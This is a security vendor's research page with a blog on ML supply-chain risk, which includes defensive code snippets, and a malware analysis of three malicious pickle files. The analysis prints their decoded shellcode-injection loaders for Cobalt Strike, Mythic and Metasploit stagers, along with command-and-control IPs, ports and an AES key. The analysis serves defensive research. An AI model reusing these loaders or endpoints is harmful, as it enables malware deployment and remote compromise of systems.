Advancing the Science of AI Security
The HiddenLayer AI Security Research team uncovers vulnerabilities, develops defenses, and shapes global standards to ensure AI remains secure, trustworthy, and resilient.



Turning Discovery Into Defense
Our mission is to identify and neutralize emerging AI threats before they impact the world. The HiddenLayer AI Security Research team investigates adversarial techniques, supply chain compromises, and agentic AI risks, transforming findings into actionable security advancements that power the HiddenLayer AI Security Platform and inform global policy.
Our AI Security Research Team
HiddenLayer’s research team combines offensive security experience, academic rigor, and a deep understanding of machine learning systems.

Kenneth Yeung
Senior AI Security Researcher

Conor McCauley
Adversarial Machine Learning Researcher

Jim Simpson
Principal Intel Analyst

Jason Martin
Director, Adversarial Research

Andrew Davis
Chief Data Scientist

Marta Janus
Principal Security Researcher
Eoin Wickens
Director of Threat Intelligence

Kieran Evans
Principal Security Researcher

Ryan Tracey
Principal Security Researcher
Kasimir Schulz
Director, Security Research
Our Impact by the Numbers
Quantifying the reach and influence of HiddenLayer’s AI Security Research.
CVEs and disclosures in AI/ML frameworks
Bypasses of AIDR at hacking events such as BSidesLV and DEF CON
Cloud Events Processed
Latest Discoveries
Explore HiddenLayer’s latest vulnerability disclosures, advisories, and technical insights advancing the science of AI security.

Supply Chain Threats: Critical Look at Your ML Ops Pipeline
In a Nutshell:
- A supply chain attack can be incredibly damaging, far-reaching, and an all-round terrifying prospect.
- Supply chain attacks on ML systems can be a little different from the ones you’re used to.
- ML systems are often privy to sensitive data that you don’t want falling into the wrong hands - data whose theft can carry big ramifications.
- We pose some pertinent questions to help you evaluate your risk factors and more accurately perform threat modeling.
- We demonstrate how easily a damaging attack can take place, showing the theft of training data stored in an S3 bucket through a compromised model.
For many security practitioners, hearing the term ‘supply chain attack’ may still bring on a pang of discomfort and unease - and for good reason. Discovering that your organization has been compromised, then determining the scope of the attack and who has been affected, is no easy thought and makes for an even worse reality. A supply-chain attack can be far-reaching and demolishes the trust you place in those you both source from and rely on. But, if there’s any good that comes from such a potentially catastrophic event, it’s that they serve as a stark reminder of why we do cybersecurity in the first place.
To protect against supply chain attacks, you need to be proactive. By the time an attack is disclosed, it may already be too late - so prevention is key. So, too, is understanding the scope of your potential exposure through supply chain risk management. Hopefully, this all sounds familiar; if not, we’ll lightly cover it later on.
The aim of this blog is to highlight the similarly affected technologies involved within the Machine Learning supply chain and the varying levels of risk involved. While it bears some resemblance to the software supply chain you’re likely used to, there are a few key differences that set them apart. By understanding this nuance, you can begin to introduce preventative measures to help ensure that both your company and its reputation are left intact.
The Impact

Over the last few years, supply chain attacks have been carved into the collective memory of the security community through major attacks such as SolarWinds and Kaseya - amongst others. With the SolarWinds breach, it is estimated that close to a hundred customers were affected through their compromised Orion IT management software, spanning public and private sector organizations alike. Later, the Kaseya incident reportedly affected over a thousand entities through their VSA management software - ultimately resulting in ransomware deployment.
The magnitude of these attacks kicked the industry into overdrive - examining supply-side exposure, increasing scrutiny of third-party software, and implementing more holistic security controls. But it’s a hard problem to solve: the components of your supply chain are not always apparent, especially when the chain is constantly evolving.
The Root Cause
So what makes these attacks so successful - and dangerous? Well, there are two key factors that the adversary exploits:
- Trust - Your software provider isn’t an APT group, right? The attacker abuses the existing trust between the producer and consumer. Given the supplier’s prevalence and reputation, their products often garner less scrutiny and can receive more lax security controls.
- Reach - One target, many victims. The one-to-many business model means that an adversary can affect the downstream customers of the victim organization in one fell swoop.
The ML Supply Chain
ML is an incredibly exciting space to be in right now, with huge advances gracing the collective newsfeed almost every week. Models such as DALL-E and Stable Diffusion are redefining the creative sphere, while AlphaTensor beats 50-year-old math records, and ChatGPT is making us question what it means to be human. Not to mention all the datasets, frameworks, and tools that enable and support this rapid progress. What’s more, outside of the computing cost, access to ML research is largely free and readily available for you to download and implement in your own environment.
But, like one uncle to a masked hero said - with great sharing, comes great need for security - or something like that. Using lessons we’ve learned from dealing with past incidents, we looked at the ML Supply Chain to understand where people are most at risk and provided some questions to ask yourself to help evaluate your risk factors:

Data Collection
A model is only as good as the dataset that it’s trained on, and it can often prove difficult to gather appropriate real-world data in-house. In many cases, you will have to source your dataset externally - either from a data-sharing repository or from a specific data provider. While often necessary, this can open you up to the world of data poisoning attacks, which may not be realized until late into the MLOps lifecycle. The end result of data poisoning is the production of an inaccurate, flawed, or subverted model, which can have a host of negative consequences.
- Is the data coming from a trusted source? e.g., You wouldn’t want to train your medical models on images scraped from a subreddit!
- Can the integrity of the data be assured?
- Can the data source be easily compromised or manipulated? See Microsoft's 'Tay'.
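One practical way to start answering the integrity question is to check downloaded files against digests published by the data provider. Below is a minimal sketch, assuming a hypothetical manifest.sha256 file in the format “<sha256>  <filename>”; it illustrates the check rather than a full provenance solution.

import hashlib
from pathlib import Path

def sha256_of(path: Path) -> str:
    """Stream the file through SHA-256 so large datasets don't have to fit in memory."""
    digest = hashlib.sha256()
    with path.open("rb") as fh:
        for chunk in iter(lambda: fh.read(1 << 20), b""):
            digest.update(chunk)
    return digest.hexdigest()

def verify_against_manifest(data_dir: str, manifest_path: str) -> bool:
    """Compare every file listed in a '<sha256>  <filename>' manifest to what is on disk."""
    ok = True
    for line in Path(manifest_path).read_text().splitlines():
        expected, name = line.split(maxsplit=1)
        actual = sha256_of(Path(data_dir) / name)
        if actual != expected:
            print(f"[!] {name}: expected {expected}, got {actual}")
            ok = False
    return ok

if __name__ == "__main__":
    # Hypothetical paths - substitute your own dataset directory and manifest.
    print("dataset intact:", verify_against_manifest("./training_data", "./manifest.sha256"))

Of course, a matching digest only proves the data is what the provider published - it says nothing about whether that data was poisoned in the first place.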
Model Sourcing
One of the most expensive parts of any ML pipeline is the cost of training your model - but it doesn’t always have to be this way. Depending on your use case, building advanced complex models can prove to be unnecessary, thanks to both the accessibility and quality of pre-trained models. It’s no surprise that pre-trained models have quickly become the status quo in ML - as this compact result of vast, expensive computation can be shared on model repositories such as HuggingFace, without having to provide the training data - or processing power.
However, such models can contain malicious code, which is especially pertinent when we consider the resources ML environments often have access to, such as other models, training data (which may contain PII), or even S3 buckets themselves.
- Is it possible that the model has been hijacked, tampered with, or compromised in some other manner?
- Is the model free of backdoors that could allow the attacker to routinely bypass it by giving it specific input?
- Can the integrity of the model be verified?
- Is the environment the model is to be executed in as restricted as possible? E.g., ACLs, VPCs, RBAC, etc.
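Returning to the malicious-code concern above: because many model formats are pickle-based, one low-cost precaution is to enumerate what a pickle file imports before ever loading it. The following is a minimal, heuristic sketch using Python’s built-in pickletools; the allowlist and model path are illustrative assumptions, and a check like this complements, rather than replaces, proper model scanning.

import pickletools

# Illustrative allowlist - tune it to the libraries your models legitimately reference.
# Anything else (builtins.exec, os.system, subprocess, ...) deserves a closer look.
ALLOWED_ROOTS = {"numpy", "sklearn", "collections", "torch"}

def suspicious_imports(pickle_path: str) -> list[str]:
    """Walk the pickle opcode stream and report GLOBAL/STACK_GLOBAL imports outside the allowlist."""
    flagged, recent_strings = [], []
    with open(pickle_path, "rb") as fh:
        for opcode, arg, _pos in pickletools.genops(fh):
            if opcode.name in ("SHORT_BINUNICODE", "BINUNICODE", "UNICODE"):
                recent_strings.append(arg)
            elif opcode.name == "GLOBAL":
                module = arg.split()[0]  # arg is "module name"
                if module.split(".")[0] not in ALLOWED_ROOTS:
                    flagged.append(arg)
            elif opcode.name == "STACK_GLOBAL" and len(recent_strings) >= 2:
                module, name = recent_strings[-2], recent_strings[-1]
                if module.split(".")[0] not in ALLOWED_ROOTS:
                    flagged.append(f"{module} {name}")
    return flagged

if __name__ == "__main__":
    # Hypothetical path - inspect before you ever pickle.load() something you downloaded.
    for hit in suspicious_imports("downloaded_model.pkl"):
        print("[!] pickle imports:", hit)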
ML Ops Tooling
Unless you’re painstakingly creating your own ML framework, chances are you depend on third-party software to build, manage and deploy your models. Libraries such as TensorFlow, PyTorch, and NumPy are mainstays of the field, providing incredible utility and ease to data scientists around the world. But these libraries often depend on additional packages, which in turn have their own dependencies, and so on. If one such dependency was compromised or a related package was replaced with a malicious one, you could be in big trouble.
A recent example of this is the ‘torchtriton’ package which, due to dependency confusion with PyPI, affected PyTorch-nightly builds for Linux between the 25th and 30th of December 2022. Anyone who downloaded the PyTorch nightly in this time frame inadvertently pulled in the malicious package, allowing the attacker to hoover up secrets from the affected endpoint. Although the attacker claims to be a researcher, the theft of ssh keys, passwd files, and bash history suggests otherwise.
If that wasn’t bad enough, widely used packages such as Jupyter Notebook can leave you wide open to a ransomware attack if improperly configured. It’s not just Python packages, though. Any third-party software you employ puts you at risk of a supply chain attack unless it has been properly vetted. Proper supply chain risk management is a must!
- What packages are being used on the endpoint?
- Is any of the software out of date, or does it contain known vulnerabilities?
- Have you verified the integrity of your packages to the best of your ability?
- Have you used any tools to identify malicious packages? E.g., Datadog’s GuardDog
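Answering the first of these questions is easier when you can dump an exact inventory of what is installed on the endpoint. The snippet below is a minimal sketch using only the standard library; it produces a list you can diff against your pinned requirements or feed to a vulnerability or malicious-package scanner, but it detects nothing malicious by itself.

from importlib import metadata

def installed_packages() -> dict[str, str]:
    """Return {distribution_name: version} for every package installed in this environment."""
    return {dist.metadata["Name"]: dist.version for dist in metadata.distributions()}

if __name__ == "__main__":
    # Diff this output against your lockfile, or hand it to an auditing tool.
    for name, version in sorted(installed_packages().items()):
        print(f"{name}=={version}")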
Build & Deployment
While it could be covered under ML Ops tooling, we wanted to draw specific attention to the build process for ML. As we saw with the SolarWinds attack, if you control the build process, you control everything that gets sent downstream. If you don’t secure your build process sufficiently, you may be the root cause of a supply chain attack as opposed to the victim.
- Are you logging what’s taking place in your build environment?
- Do you have mitigation strategies in place to help prevent an attack?
- Do you know what packages are running in your build environment?
- Are you purging your build environment after each build?
- Is access to your datasets restricted?
As for deployment - your model will more than likely be hosted on a production system and exposed to end users through a REST API, allowing these stakeholders to query it with their relevant data and retrieve a prediction or classification. More often than not, these results are business-critical, requiring a high degree of accuracy. If a truly insidious adversary wanted to cause long-term damage, they might attempt to degrade the model’s performance or affect the results of the downstream consumer. In this situation, the onus is on the deployer to ensure that their model has not been compromised or its results tampered with.
- Is the integrity of the model being routinely verified post-deployment?
- Do the model’s outputs match those of the pre-deployment tests?
- Has drift affected the model over time, such that it’s now providing incorrect results?
- Is the software on the deployment server up to date?
- Are you making the best use of your cloud platform's security controls?
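One lightweight way to act on the first two questions is to replay a fixed set of “golden” inputs against the live endpoint and compare the responses with predictions recorded before deployment. The sketch below assumes a hypothetical JSON prediction API and a golden_tests.json file of recorded cases; it is illustrative rather than a drop-in monitoring solution.

import json
import urllib.request
from pathlib import Path

def replay_golden_tests(endpoint: str, golden_path: str, tolerance: float = 1e-6) -> bool:
    """POST each recorded input to the live model and compare against the recorded prediction."""
    golden = json.loads(Path(golden_path).read_text())  # [{"input": {...}, "expected": [...]}, ...]
    all_ok = True
    for case in golden:
        req = urllib.request.Request(
            endpoint,
            data=json.dumps(case["input"]).encode(),
            headers={"Content-Type": "application/json"},
        )
        with urllib.request.urlopen(req) as resp:
            got = json.loads(resp.read())["prediction"]  # assumes numeric outputs
        if any(abs(g - e) > tolerance for g, e in zip(got, case["expected"])):
            print(f"[!] output mismatch for input {case['input']}")
            all_ok = False
    return all_ok

if __name__ == "__main__":
    # Hypothetical endpoint and golden-test file; run this on a schedule post-deployment.
    replay_golden_tests("https://models.example.com/churn/v3/predict", "golden_tests.json")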
A Worst Case Scenario - SageMaker Supply Chain Attack
A picture paints a thousand words, and as we’re getting a little high on word count, we decided to go for a video demonstration instead. To illustrate the potential consequences of an ML-specific supply chain attack, we use a cloud-based ML development platform - Amazon SageMaker - and a hijacked model; however, it could just as well be a malicious package or an ML-adjacent application with a security vulnerability. This demo shows just how easy it is to steal training data from improperly configured S3 buckets - data that could be your customers’ PII, business-sensitive information, or something else entirely.
https://youtu.be/0R5hgn3joy0
Mitigating Risk
It Pays to Be Proactive
By now, we’ve heard a lot of stomach-churning stuff, but what can we do about it? In April 2021, the US Cybersecurity and Infrastructure Security Agency (CISA) released a 16-page security advisory outlining a series of proactive measures organizations can take to help prevent a supply chain attack from occurring. More specifically, it points to frameworks such as Cyber Supply Chain Risk Management (C-SCRM) and the Secure Software Development Framework (SSDF). While we wish that ML were free of the usual supply chain risks, many of these points still hold true - with some new things to consider, too.
Integrity & Verification
Verify what you can, and ensure the integrity of the data you produce and consume. In other words, make sure that the files you get are the files you expected to get. If not, you may be in for a nasty surprise. There are many ways to do this, from cryptographic hashing to certificates to a deeper-dive manual inspection.
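For artifacts you produce yourself and consume downstream, even a simple symmetric signature goes a long way. The sketch below uses HMAC-SHA256 with a shared secret purely as an illustration; for artifacts crossing organizational boundaries, public-key signatures or certificates are a better fit, and the key handling here is deliberately simplified.

import hashlib
import hmac

# Illustrative secret - in practice, load this from a secrets manager, never from source control.
SIGNING_KEY = b"replace-me-with-a-managed-secret"

def sign_artifact(path: str) -> str:
    """Producer side: emit an HMAC-SHA256 tag for an artifact you publish."""
    with open(path, "rb") as fh:
        return hmac.new(SIGNING_KEY, fh.read(), hashlib.sha256).hexdigest()

def verify_artifact(path: str, expected_tag: str) -> bool:
    """Consumer side: recompute the tag and compare it in constant time."""
    return hmac.compare_digest(sign_artifact(path), expected_tag)

if __name__ == "__main__":
    tag = sign_artifact("model.joblib")  # hypothetical artifact name
    print("verified:", verify_artifact("model.joblib", tag))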
Keep Your (Attack) Surfaces Clean
If you’re a fan of cooking, you’ll know that the cooking is the fun part, and the cleanup - not so much. But that cleanup means you can cook that dish you love tomorrow night without the chance of falling ill. By the same virtue, when you’re building ML systems, make sure you clean up any leftover access tokens, build environments, development endpoints, and data stores. If you clean as you go, you’re mitigating risk and ensuring that the next project goes off without a hitch. Not to mention - a spring clean in your cloud environment may save your organization more than a few dollars at the end of the month.
Model Scanning
In past blogs, we’ve shown just how dangerous a model can be and highlighted how attackers are actively using model formats such as Pickle as a launchpad for post-exploitation frameworks. As such, it’s always a good idea to inspect your models thoroughly for signs of malicious code or illicit tampering. We released YARA rules to aid in the detection of particular varieties of hijacked models and also offer a model scanning service for an added layer of confidence.
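If you already have a ruleset on hand (for example, rules targeting hijacked pickle files), wiring it into your model intake process takes only a few lines. This is a minimal sketch assuming the yara-python package is installed; pickle_malware.yar and downloaded_model.pkl are placeholder paths.

import yara  # pip install yara-python

def scan_model(model_path: str, rules_path: str) -> list[str]:
    """Compile a YARA ruleset and return the names of any rules that match the model file."""
    rules = yara.compile(filepath=rules_path)
    return [match.rule for match in rules.match(filepath=model_path)]

if __name__ == "__main__":
    # Placeholder paths - point rules_path at your ruleset for hijacked/suspicious models.
    hits = scan_model("downloaded_model.pkl", "pickle_malware.yar")
    print("matches:", hits or "none")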
Cloud Security
Make use of what you’ve got: most cloud service providers offer some level of security mechanisms, such as Access Control Lists (ACLs), Virtual Private Clouds (VPCs), Role-Based Access Control (RBAC), and more. In some cases, you can even disconnect your models from the internet during training to help mitigate some of the risks - though this won’t stop an attacker from waiting until you’re back online again.
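Tying this back to the SageMaker demo above, a quick win is to verify programmatically that the buckets holding your training data block public access. The sketch below uses boto3 and assumes a hypothetical bucket name plus credentials allowed to read the bucket’s public access configuration; it checks just one control among the many your cloud provider offers.

import boto3  # pip install boto3
from botocore.exceptions import ClientError

def bucket_blocks_public_access(bucket_name: str) -> bool:
    """Return True only if every S3 Block Public Access setting is enabled for the bucket."""
    s3 = boto3.client("s3")
    try:
        config = s3.get_public_access_block(Bucket=bucket_name)["PublicAccessBlockConfiguration"]
    except ClientError:
        # Treat a missing configuration (or an error fetching it) as not locked down.
        return False
    return all(config.get(flag, False) for flag in (
        "BlockPublicAcls", "IgnorePublicAcls", "BlockPublicPolicy", "RestrictPublicBuckets",
    ))

if __name__ == "__main__":
    # Hypothetical bucket holding training data.
    print("training-data bucket locked down:", bucket_blocks_public_access("my-training-data-bucket"))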
In Conclusion
While being in a state of hypervigilance can be tiring, looking critically at your ML Ops pipeline every now and again does no harm - in fact, quite the opposite. Supply-chain attacks are on the rise, and the rules of engagement we’ve learned through dealing with them very much apply to Machine Learning. The relative modernity of the space, coupled with vast stores of sensitive information and accelerating data privacy regulation, means that attacks on ML supply chains have the potential to be explosively damaging in a multitude of ways.
That said, the questions we pose in this blog can help you threat model for such an event, mitigate risk, and improve your overall security posture.

Pickle Files: The New ML Model Attack Vector
Introduction
In our previous blog post, “Weaponizing Machine Learning Models with Ransomware”, we uncovered how malware can be surreptitiously embedded in ML models and automatically executed using standard data deserialization libraries - namely pickle.
Shortly after publishing, several people got in touch to see if we had spotted adversaries abusing the pickle format to deploy malware - and as it transpires, we have.

In this supplementary blog, we look at three malicious pickle files used to deploy Cobalt Strike, Metasploit, and Mythic respectively, each uploaded to public repositories in recent months. We provide a brief analysis of these files to show how this attack vector is being actively exploited in the wild.
Findings
Cobalt Strike Stager
SHA256: 391f5d0cefba81be3e59e7b029649dfb32ea50f72c4d51663117fdd4d5d1e176
The first malicious pickle file (serialized with pickle protocol version 3) was uploaded in January 2022 and uses the built-in Python exec function to execute an embedded Python script. The script relies on the ctypes library to invoke Windows APIs such as VirtualAlloc and CreateThread. In this way, it injects and runs a 64-bit Cobalt Strike stager shellcode.
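For readers less familiar with why loading an untrusted pickle is equivalent to running untrusted code, here is a harmless sketch of the same mechanism these samples abuse: an object’s __reduce__ method tells pickle to call an attacker-chosen callable at deserialization time. The payload here is just print; the samples below swap in exec over embedded scripts.

import pickle

class Demo:
    def __reduce__(self):
        # At unpickling time, pickle calls the returned callable with the given arguments.
        # A benign print() here; the samples analyzed below return exec(<embedded script>) instead.
        return (print, ("code ran during pickle.loads()",))

blob = pickle.dumps(Demo())
pickle.loads(blob)  # prints the message: deserialization executed a callable we chose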
We’ve used a simple pickle “disassembler” based on code from Kaitai Struct (http://formats.kaitai.io/python_pickle/) to highlight the opcodes used to execute each payload:
\x80 proto: 3
\x63 global_opcode: builtins exec
\x71 binput: 0
\x58 binunicode:
import ctypes,urllib.request,codecs,base64
AbCCDeBsaaSSfKK2 = "WEhobVkxeDRORGhj" // shellcode, truncated for readability
AbCCDe = base64.b64decode(base64.b64decode(AbCCDeBsaaSSfKK2))
AbCCDe =codecs.escape_decode(AbCCDe)[0]
AbCCDe = bytearray(AbCCDe)
ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_uint64
ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0), ctypes.c_int(len(AbCCDe)), ctypes.c_int(0x3000), ctypes.c_int(0x40))
buf = (ctypes.c_char * len(AbCCDe)).from_buffer(AbCCDe)
ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_uint64(ptr), buf, ctypes.c_int(len(AbCCDe)))
handle = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0), ctypes.c_int(0), ctypes.c_uint64(ptr), ctypes.c_int(0), ctypes.c_int(0), ctypes.pointer(ctypes.c_int(0)))
ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(handle),ctypes.c_int(-1))
\x71 binput: 1
\x85 tuple1
\x71 binput: 2
\x52 reduce
\x71 binput: 3
\x2e stop
The base64 encoded shellcode from this sample connects to https://121.199.68[.]210/Swb1 with a unique User-Agent string Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; NP09; NP09; MAAU)

The IP hardcoded in this shellcode appears in various intel feeds in relation to Cobalt Strike activity; a few different Cobalt Strike stagers were spotted talking to this IP, and a beacon DLL, which used to be hosted there at some point, features a watermark associated with many cybercriminal groups, including TrickBot/SmokeLoader, Nobelium, and APT29.

Mythic Stager
SHA256: 806ca6c13b4abaec1755de209269d06735e4d71a9491c783651f48b0c38862d5
The second sample (serialized using pickle protocol version 4) appeared in the wild in July 2022. It’s rather similar to the first one in the way it uses the ctypes library to load and execute a 32-bit stager shellcode.
\x80 proto: 4
\x95 frame: 5397
\x8c short_binunicode: builtins
\x94 memoize
\x8c short_binunicode: exec
\x94 memoize
\x93 stack_global
\x94 memoize
\x58 binunicode:
import base64
import ctypes
import codecs
shellcode= "" // removed for readability
shellcode = base64.b64decode(shellcode)
shellcode = codecs.escape_decode(shellcode)[0]
shellcode = bytearray(shellcode)
ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),
ctypes.c_int(len(shellcode)),
ctypes.c_int(0x3000),
ctypes.c_int(0x40))
buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(ptr),
buf,
ctypes.c_int(len(shellcode)))
ht = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),
ctypes.c_int(0),
ctypes.c_int(ptr),
ctypes.c_int(0),
ctypes.c_int(0),
ctypes.pointer(ctypes.c_int(0)))
ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(ht), ctypes.c_int(-1))
\x94 memoize
\x85 tuple1
\x94 memoize
\x52 reduce
\x94 memoize
\x2e stop
In this case, the shellcode connects to 43.142.60[.]207:9091/7Iyc with the User-Agent set to Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)

The hardcoded IP address was recently mentioned in the Team Cymru report on the Mythic C2 framework. Mythic is a Python-based post-exploitation red teaming platform and an open-source alternative to Cobalt Strike. By pivoting on the ETag value present in the HTTP headers of Mythic-related requests, Team Cymru researchers were able to compile a list of IPs that are likely related to Mythic - and this IP was one of them.
What’s interesting is that just over 4 months ago (August 2022), Mythic introduced a pickle wrapper module that allows the C2 agent to be injected into a pickle-serialized machine learning model! This means that some pentesting exercises already consider ML models as an attack vector. However, Mythic is known to be used not only in red teaming activities but also by some notorious cybercriminal groups, and has recently been spotted in connection with a 2022 campaign targeting Pakistani and Turkish government institutions, as well as spreading BazarLoader malware.
Metasploit Stager
SHA256: 9d11456e8acc4c80d14548d9fc656c282834dd2e7013fe346649152282fcc94b
This sample appeared under the name favicon.ico in mid-November 2022 and features a bit more obfuscation than the previous two samples. The shellcode injection function is encrypted with AES-ECB using a hardcoded passphrase, hello_i_4m_cc_12. The shellcode itself is computed via an arithmetic operation on a large integer value and contains a Metasploit reverse-tcp shell that connects to a hardcoded IP, 1.15.8[.]106, on port 6666.
\x80 proto: 3
\x63 global_opcode: builtins exec
\x71 binput: 0
\x58 binunicode:
import subprocess
import os
import time
from Crypto.Cipher import AES
import base64
from Crypto.Util.number import *
import random
while True:
    ret = subprocess.run("ping baidu.com -n 1", shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
    if ret.returncode==0:
        key=b'hello_i_4m_cc_12'
        a2=b'p5uzeWCm6STXnHK3 [...]' // truncated for readability
        enc=base64.b64decode(a2)
        ae=AES.new(key,AES.MODE_ECB)
        num2=9287909549576993 [...] // truncated for readability
        num1=(num2//888-777)//666
        buf=long_to_bytes(num1)
        exec(ae.decrypt(enc))
    elif ret.returncode==1:
        time.sleep(60)
\x71 binput: 1
\x85 tuple1
\x71 binput: 2
\x52 reduce
\x71 binput: 3
\x2e stop
The decrypted injection code is very much the same as observed previously, with Windows APIs being invoked through the ctypes library to inject the payload into executable memory and run it via a new thread.
import ctypes
shellcode = bytearray(buf)
ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_uint64
ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0), ctypes.c_int(len(shellcode)), ctypes.c_int(0x3000), ctypes.c_int(0x40))
buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_uint64(ptr), buf, ctypes.c_int(len(shellcode)))
handle = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0), ctypes.c_int(0), ctypes.c_uint64(ptr), ctypes.c_int(0), ctypes.c_int(0), ctypes.pointer(ctypes.c_int(0)))
ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(handle),ctypes.c_int(-1))
The decoded shellcode turns out to be a 64-bit reverse-tcp stager.

The hardcoded IP address is located in China and was acting as a Cobalt Strike C2 server as late as October 2022, according to multiple Cobalt Strike trackers.
Conclusions
Although we can't be 100% sure that the described malicious pickle files have been used in real-world attacks (as we lack the contextual information), our findings prove that adversaries are already exploring this attack vector as a method of malware deployment. The IP addresses hardcoded in the above samples have been used in other in-the-wild malware, including various instances of Cobalt Strike and Mythic stagers, suggesting that these pickle-serialized shellcodes were not part of legitimate research or red teaming activity. This emerging trend highlights the intersection of adversarial machine learning and AI data poisoning: attackers can undermine the integrity of machine learning models by injecting malicious code via compromised datasets or models. As some post-exploitation and so-called “adversary emulation” frameworks start building support for this attack vector, it’s only a matter of time until we see such attacks on the rise.
We’ve put together a set of YARA rules to detect malicious/suspicious pickle files which can be found in HiddenLayer's public BitBucket repository.
For more information on how model injection works, what the possible scenarios and consequences are, and how to mitigate the risks, check out our detailed blog on Weaponizing Machine Learning Models.
In the News
HiddenLayer’s research is shaping global conversations about AI security and trust.

HiddenLayer Selected as Awardee on $151B Missile Defense Agency SHIELD IDIQ Supporting the Golden Dome Initiative
Austin, TX – December 23, 2025 – HiddenLayer, the leading provider of Security for AI, today announced it has been selected as an awardee on the Missile Defense Agency’s (MDA) Scalable Homeland Innovative Enterprise Layered Defense (SHIELD) multiple-award, indefinite-delivery/indefinite-quantity (IDIQ) contract. The SHIELD IDIQ has a ceiling value of $151 billion and serves as a core acquisition vehicle supporting the Department of Defense’s Golden Dome initiative to rapidly deliver innovative capabilities to the warfighter.
The program enables MDA and its mission partners to accelerate the deployment of advanced technologies with increased speed, flexibility, and agility. HiddenLayer was selected based on its successful past performance on ongoing US Federal contracts and projects with the Department of Defense (DoD) and the United States Intelligence Community (USIC). “This award reflects the Department of Defense’s recognition that securing AI systems, particularly in highly classified environments, is now mission-critical,” said Chris “Tito” Sestito, CEO and Co-founder of HiddenLayer. “As AI becomes increasingly central to missile defense, command and control, and decision-support systems, securing these capabilities is essential. HiddenLayer’s technology enables defense organizations to deploy and operate AI with confidence in the most sensitive operational environments.”
Underpinning HiddenLayer’s unique solution for the DoD and USIC is HiddenLayer’s Airgapped AI Security Platform, the first solution designed to protect AI models and development processes in fully classified, disconnected environments. Deployed locally within customer-controlled environments, the platform supports strict US Federal security requirements while delivering enterprise-ready detection, scanning, and response capabilities essential for national security missions.
HiddenLayer’s Airgapped AI Security Platform delivers comprehensive protection across the AI lifecycle, including:
- Comprehensive Security for Agentic, Generative, and Predictive AI Applications: Advanced AI discovery, supply chain security, testing, and runtime defense.
- Complete Data Isolation: Sensitive data remains within the customer environment and cannot be accessed by HiddenLayer or third parties unless explicitly shared.
- Compliance Readiness: Designed to support stringent federal security and classification requirements.
- Reduced Attack Surface: Minimizes exposure to external threats by limiting unnecessary external dependencies.
“By operating in fully disconnected environments, the Airgapped AI Security Platform provides the peace of mind that comes with complete control,” continued Sestito. “This release is a milestone for advancing AI security where it matters most: government, defense, and other mission-critical use cases.”
The SHIELD IDIQ supports a broad range of mission areas and allows MDA to rapidly issue task orders to qualified industry partners, accelerating innovation in support of the Golden Dome initiative’s layered missile defense architecture.
Performance under the contract will occur at locations designated by the Missile Defense Agency and its mission partners.
About HiddenLayer
HiddenLayer, a Gartner-recognized Cool Vendor for AI Security, is the leading provider of Security for AI. Its security platform helps enterprises safeguard their agentic, generative, and predictive AI applications. HiddenLayer is the only company to offer turnkey security for AI that does not add unnecessary complexity to models and does not require access to raw data and algorithms. Backed by patented technology and industry-leading adversarial AI research, HiddenLayer’s platform delivers supply chain security, runtime defense, security posture management, and automated red teaming.
Contact
SutherlandGold for HiddenLayer
hiddenlayer@sutherlandgold.com

HiddenLayer Announces AWS GenAI Integrations, AI Attack Simulation Launch, and Platform Enhancements to Secure Bedrock and AgentCore Deployments
AUSTIN, TX — December 1, 2025 — HiddenLayer, the leading AI security platform for agentic, generative, and predictive AI applications, today announced expanded integrations with Amazon Web Services (AWS) Generative AI offerings and a major platform update debuting at AWS re:Invent 2025. HiddenLayer offers additional security features for enterprises using generative AI on AWS, complementing existing protections for models, applications, and agents running on Amazon Bedrock, Amazon Bedrock AgentCore, Amazon SageMaker, and SageMaker Model Serving Endpoints.
As organizations rapidly adopt generative AI, they face increasing risks of prompt injection, data leakage, and model misuse. HiddenLayer’s security technology, built on AWS, helps enterprises address these risks while maintaining speed and innovation.
“As organizations embrace generative AI to power innovation, they also inherit a new class of risks unique to these systems,” said Chris Sestito, CEO and Co-Founder of HiddenLayer. “Working with AWS, we’re ensuring customers can innovate safely, bringing trust, transparency, and resilience to every layer of their AI stack.”
Built on AWS to Accelerate Secure AI Innovation
HiddenLayer’s AI Security Platform and integrations are available in AWS Marketplace, offering native support for Amazon Bedrock and Amazon SageMaker. The company complements AWS infrastructure security by providing AI-specific threat detection, identifying risks within model inference and agent cognition that traditional tools overlook.
Through automated security gates, continuous compliance validation, and real-time threat blocking, HiddenLayer enables developers to maintain velocity while giving security teams confidence and auditable governance for AI deployments.
Alongside these integrations, HiddenLayer is introducing a complete platform redesign and the launches of a new AI Discovery module and an enhanced AI Attack Simulation module, further strengthening its end-to-end AI Security Platform that protects agentic, generative, and predictive AI systems.
Key enhancements include:
- AI Discovery: Identifies AI assets within technical environments to build AI asset inventories.
- AI Attack Simulation: Automates adversarial testing and Red Teaming to identify vulnerabilities before deployment.
- Complete UI/UX Revamp: Simplified sidebar navigation and reorganized settings for faster workflows across AI Discovery, AI Supply Chain Security, AI Attack Simulation, and AI Runtime Security.
- Enhanced Analytics: Filterable and exportable data tables, with new module-level graphs and charts.
- Security Dashboard Overview: Unified view of AI posture, detections, and compliance trends.
- Learning Center: In-platform documentation and tutorials, with future guided walkthroughs.
HiddenLayer will demonstrate these capabilities live at AWS re:Invent 2025, December 1–5 in Las Vegas.
To learn more or request a demo, visit https://hiddenlayer.com/reinvent2025/.
About HiddenLayer
